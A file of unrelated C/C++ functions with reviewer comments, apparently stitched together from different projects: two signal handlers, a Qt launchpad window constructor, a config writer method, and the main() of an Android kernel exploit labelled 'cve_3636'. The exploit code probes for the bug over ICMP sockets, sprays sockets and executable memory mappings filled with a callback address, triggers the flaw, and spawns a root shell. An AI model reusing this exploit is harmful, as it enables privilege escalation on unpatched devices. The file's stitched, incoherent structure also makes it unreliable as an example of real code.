/*
 * Abort-path handler (the log text says "sigabrt received", so it is
 * presumably installed for SIGABRT; the registration is not visible here).
 *
 * Logs the event, closes the child if a client is currently set, closes the
 * syslog channel and leaves the process immediately with status 1.
 *
 * NOTE(review): syslog() is not on the POSIX async-signal-safe list, and
 * close_child()/syslog_close() are defined elsewhere, so whether this is safe
 * to run at an arbitrary interruption point cannot be confirmed from this
 * block. _exit() itself is async-signal-safe.
 */
static void abrt_handler(int sig)
{
    (void)sig; /* the signal number is not used */

    syslog(LOG_ERR, "sigabrt received");

    /* Only tear the child down when a client session exists. The meaning of
     * the `false` argument is defined by close_child() -- not visible here. */
    if (client != NULL) {
        close_child(false);
    }

    syslog_close();

    /* _exit() rather than exit(): no atexit handlers, no stdio flushing. */
    _exit(1);
}
/*
 * Termination handler (the log text says "sigterm received", so it is
 * presumably installed for SIGTERM; the registration is not visible here).
 *
 * With no client set it only raises the `terminate` flag and returns, leaving
 * the shutdown to whatever code polls that flag. With a client set it calls
 * client_quit(), closes the child, closes syslog and exits with status 1.
 *
 * NOTE(review): syslog() is not on the POSIX async-signal-safe list, and
 * client_quit()/close_child()/syslog_close() are defined elsewhere, so the
 * handler's safety at an arbitrary interruption point cannot be confirmed
 * here. The declaration of `terminate` is not visible either; a flag written
 * from a handler is normally `volatile sig_atomic_t` -- confirm.
 */
static void term_handler(int sig)
{
    (void)sig; /* the signal number is not used */

    syslog(LOG_NOTICE, "sigterm received");

    /* No active client: request a deferred shutdown and return. */
    if (client == NULL) {
        terminate = true;
        return;
    }

    /* Active client: end the session here and leave the process.
     * The meaning of the `true` argument is defined by close_child(). */
    client_quit();
    close_child(true);
    syslog_close();
    _exit(1);
}
/**
 * Construct the launchpad main window.
 *
 * Forwards `parent` to QMainWindow and `initial_quota` to Launchpad, builds
 * the generated UI, installs the launcher and children dock contents, hides
 * the children and status docks, starts a 200 ms timer that calls
 * avail_quota_update(), and starts a Middle object whose quit_child() signal
 * is wired to this window's close_child() slot.
 *
 * @param initial_quota  passed unchanged to the Launchpad base
 * @param parent         parent widget handed to QMainWindow
 */
Qt_launchpad::Qt_launchpad(unsigned long initial_quota, QWidget *parent)
: QMainWindow(parent), Launchpad(initial_quota)
{
    setupUi(this);

    // Clear the minimize/maximize button hint.
    // NOTE(review): AND-ing with a mask can only clear bits, so the
    // "| Qt::WindowStaysOnTopHint" term cannot switch stay-on-top on; it only
    // keeps that bit in the mask. Confirm this is what was intended.
    Qt::WindowFlags window_flags = windowFlags();
    window_flags &= ((~Qt::WindowMinMaxButtonsHint)|(Qt::WindowStaysOnTopHint));
    setWindowFlags(window_flags);

    // Closing this window should count towards lastWindowClosed().
    setAttribute(Qt::WA_QuitOnClose, true);

    // Launcher dock: the QToolBox is installed directly as the dock's widget
    // (no scroll area is wrapped around it).
    launcherDockWidgetContents = new QToolBox();
    launcherDockWidget->setWidget(launcherDockWidgetContents);
    launcherDockWidget->setFont(QFont("OS5",12,QFont::Bold));

    // Children dock: the contents widget sits inside a frameless scroll area
    // so the child entries can be scrolled.
    QScrollArea *child_scroller = new QScrollArea;
    child_scroller->setFrameStyle(QFrame::NoFrame);
    child_scroller->setWidget(childrenDockWidgetContents);
    childrenDockWidget->setWidget(child_scroller);
    childrenDockWidget->setFont(QFont("OS5",12,QFont::Bold));

    // Top-aligned vertical layout without margins or spacing for the entries.
    // NOTE(review): Qt's QScrollArea::setWidget() documentation asks for the
    // widget's layout to be in place before that call; here the layout is
    // installed afterwards -- confirm the entries show up as expected.
    QVBoxLayout *child_layout = new QVBoxLayout;
    child_layout->setContentsMargins(0, 0, 0, 0);
    child_layout->setSpacing(0);
    child_layout->setAlignment(Qt::AlignTop);
    childrenDockWidgetContents->setLayout(child_layout);

    // Both docks start hidden.
    childrenDockWidget->hide();
    statusDockWidget->hide();

    // React when either dock is floated or re-docked.
    QObject::connect(childrenDockWidget,SIGNAL(topLevelChanged(bool)),this,SLOT(enlarge_childrenDockWg(bool)));
    QObject::connect(statusDockWidget,SIGNAL(topLevelChanged(bool)),this,SLOT(enlarge_statusDockWg(bool)));

    // Refresh the available-quota bar every 200 ms; the timer is parented to
    // this window.
    QTimer *quota_timer = new QTimer(this);
    connect(quota_timer, SIGNAL(timeout()), this, SLOT(avail_quota_update()));
    quota_timer->start(200);

    // Middle is declared elsewhere; start() suggests a thread-like object.
    // NOTE(review): it is created without a parent and no delete is visible
    // in this block -- presumably it lives as long as the process; confirm.
    Middle* quit_watcher=new Middle();
    QObject::connect(quit_watcher,SIGNAL(quit_child()),this,SLOT(close_child()));
    QObject::connect(this,SIGNAL(unlock_child()),quit_watcher,SLOT(unlock()));
    quit_watcher->start();
}
/*
 * Entry point of a proof-of-concept that first tests for, and then tries to
 * make use of, a kernel issue the program itself labels "cve_3636", working
 * through ICMP sockets. On success it starts /system/bin/sh (an Android path).
 *
 * The helpers called here (protect_from_oom_killer, create_icmp_socket,
 * setup_vul_socket, maximize_fd_limit, create_child, close_child,
 * fill_payload, get_sk, call_back) and the constants (_PAGE_SIZE, MAX_MMAP,
 * MAX_CHILD, MAX_SOCKS, MAP_SIZE) are defined outside this view; the comments
 * below describe only what this function visibly does with them.
 *
 * Returns -1 when a setup step fails or the probe reports "not vulnerable",
 * 0 after the final loop ends.
 *
 * Defender notes, drawn from the visible code:
 *  - Probe: a zeroed page is mapped at the fixed address 0x200000 and the run
 *    stops unless that page holds non-zero data after setup_vul_socket(fd).
 *  - Observable behaviour: fixed-address shared anonymous mappings (0x200000,
 *    and 0x50000000 with PROT_EXEC), a burst of child creation paced 0.5 s
 *    apart, repeated read/write/execute anonymous mappings of MAP_SIZE, an
 *    ioctl with request 0x5678 on an ICMP socket, then a shell being spawned.
 *  - Hardening this pattern presumably relies on being absent (TODO confirm
 *    against the helper sources): the kernel fix for the underlying issue;
 *    limits on who may create ICMP sockets (e.g. net.ipv4.ping_group_range on
 *    Linux, assuming create_icmp_socket() uses unprivileged ping sockets);
 *    and protections that stop the kernel from executing or dereferencing
 *    user-space pages (PXN/SMEP, PAN/SMAP), since the code plants a
 *    user-space function address throughout a user mapping.
 */
int main() {
    int *socks;
    unsigned long *address[MAX_MMAP];
    int pid[MAX_CHILD];
    int pipe_read[MAX_CHILD];
    void *addr;
    int max_fds;
    int i, num_socks, num_child;
    int j;
    int success, count;
    int fd;
    int vulnerable = 0;
    int child_socks, total_child_socks;
    int temp;
    unsigned long *target;

    /* Probe page: one shared anonymous page at the fixed address 0x200000,
     * cleared to zero so that any later non-zero word is detectable. */
    addr = mmap((void*)0x200000, _PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_SHARED | MAP_ANONYMOUS, -1, 0);
    if (addr == MAP_FAILED) {
        printf("map failed!\n");
        return -1;
    }
    memset((void*)0x200000, 0, _PAGE_SIZE);

    /* By name, adjusts this process's OOM-killer standing -- body not visible. */
    protect_from_oom_killer();

    fd = create_icmp_socket();
    if (fd < 0) {
        printf("can not crate icmp socket!\n");
        return -1;
    }
    setup_vul_socket(fd);

    /* Vulnerability check: the system is treated as affected only if the
     * probe page is no longer all zero after setup_vul_socket(fd). */
    for (i = 0; i < _PAGE_SIZE / sizeof(int *); i++) {
        if (((unsigned int*)addr)[i] != 0) {
            vulnerable = 1;
            break;
        }
    }
    if (vulnerable == 0) {
        printf("cve_3636 not vulnerable!\n");
        return -1;
    }

    /* Second fixed mapping: 0x4000 bytes at 0x50000000, readable, writable
     * and executable. */
    if (mmap(0x50000000, 0x4000, PROT_WRITE | PROT_READ | PROT_EXEC, MAP_SHARED | MAP_ANONYMOUS | MAP_FIXED, -1, 0) != 0x50000000) {
        printf("map shellcode area failed!\n");
        return -1;
    }
    /* Every 4-byte step of that region is written with the address of
     * call_back (defined elsewhere). */
    for (i = 0; i < 0x4000; i += 4){
        target = 0x50000000 + i;
        *target = call_back;
    }

    /* my_pid is a variable declared outside this function. */
    my_pid = getpid();

    /* By name, raises the open-file limit and returns it -- body not visible. */
    max_fds = maximize_fd_limit();
    printf("max_fds = %d\n", max_fds);

    /* Descriptor table for this process's ICMP sockets, with room for a -1
     * terminator. The allocation result is not checked. */
    socks = malloc(sizeof(int*) * (max_fds + 1));

    printf("create child to spray\n");
    num_child = 0;
    num_socks = 0;
    child_socks = 0;
    total_child_socks = 0;

    /* Child phase: up to MAX_CHILD calls to create_child(), stopping early
     * once the reported child socket total exceeds MAX_SOCKS or a call fails.
     * After each child one more ICMP socket is opened in this process. */
    for (i = 0; i < MAX_CHILD; i++) {
        if (total_child_socks > MAX_SOCKS) break;
        pid[i] = create_child(&pipe_read[i], max_fds, &child_socks);
        if (pid[i] == -1) break;
        printf(".");
        fflush(stdout);
        //printf("create vulnerable socket!\n");
        total_child_socks += child_socks;
        //printf("\n now child sockets = %d\n", total_child_socks);
        if ( num_socks < max_fds) {
            socks[num_socks] = create_icmp_socket();
            if (socks[num_socks] == -1) break;
            num_socks++;
        }
        /* Half-second pause between iterations. */
        usleep(500000);
    }
    num_child = i;
    printf("total child sockets: %d\n", total_child_socks);
    printf("\nchild num: %d\n", num_child);

    /* -1 marks the end of the socket list for the scan loop further down. */
    socks[num_socks] = -1;
    printf("vulnerable socket num: %d\n", num_socks);

    printf("now close child socket!\n");
    for (i = 0; i < num_child; i++) {
        close_child(pid[i]);
    }

    /* The same setup step used for the probe socket is now applied to every
     * socket kept in this process. */
    printf("setup vulnerable socket!\n");
    for (i = 0; i < num_socks; i++) {
        setup_vul_socket(socks[i]);
    }

    printf("sparying ...\n");
    success = 0;
    /* Mapping phase: repeats until get_sk() reports a positive value for one
     * of the sockets. NOTE(review): there is no exit besides success, so the
     * loop can run without bound. */
    while (1) {
        count = 0;
        for (i = 0; i < MAX_MMAP; i++) {
            /* One more shared anonymous RWX region, filled by fill_payload(). */
            address[i] = mmap((void*)0, MAP_SIZE, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_SHARED|MAP_ANONYMOUS, -1, 0);
            if (address[i] == MAP_FAILED) {
                printf("map failed!\n");
                break;
            }
            fill_payload(address[i], MAP_SIZE);
            /* Check every kept socket after each new mapping. */
            for (j = 0; socks[j] != -1; j++) {
                if (get_sk(socks[j]) > 0) {
                    success = 1;
                    printf("get it!\n");
                    /* Request 0x5678 is issued on the matching socket; what
                     * it reaches is not visible in this function. */
                    ioctl(socks[j], 0x5678, &temp);
                    break;
                }
            }
            if (success) break;
        }
        count = i;
        if (success) {
            /* Cleanup, then an interactive shell at the Android path. */
            printf("free %ld bytes\n", MAP_SIZE * (count - 1));
            for (i = 0; i < count; i++) {
                munmap(address[i], MAP_SIZE);
            }
            munmap(0x50000000, 0x4000);
            system("/system/bin/sh");
            break;
        }
    }
    printf("main end!\n");
    return 0;
}
/**
 * Write `cfg` as a child element named `key`.
 *
 * Calls open_child(key), writes `cfg` through the free function ::write()
 * with this writer's `out_` and `level_`, then calls close_child(key).
 *
 * NOTE(review): if ::write() throws, close_child(key) is not reached and the
 * element opened by open_child(key) is left unclosed -- confirm whether
 * callers depend on the output staying balanced after an error.
 *
 * @param key  name passed to both open_child() and close_child()
 * @param cfg  configuration written between the two calls
 */
void config_writer::write_child(const std::string &key, const config &cfg)
{
    this->open_child(key);

    // Global-namespace write(), not a member of config_writer.
    ::write(this->out_, cfg, this->level_);

    this->close_child(key);
}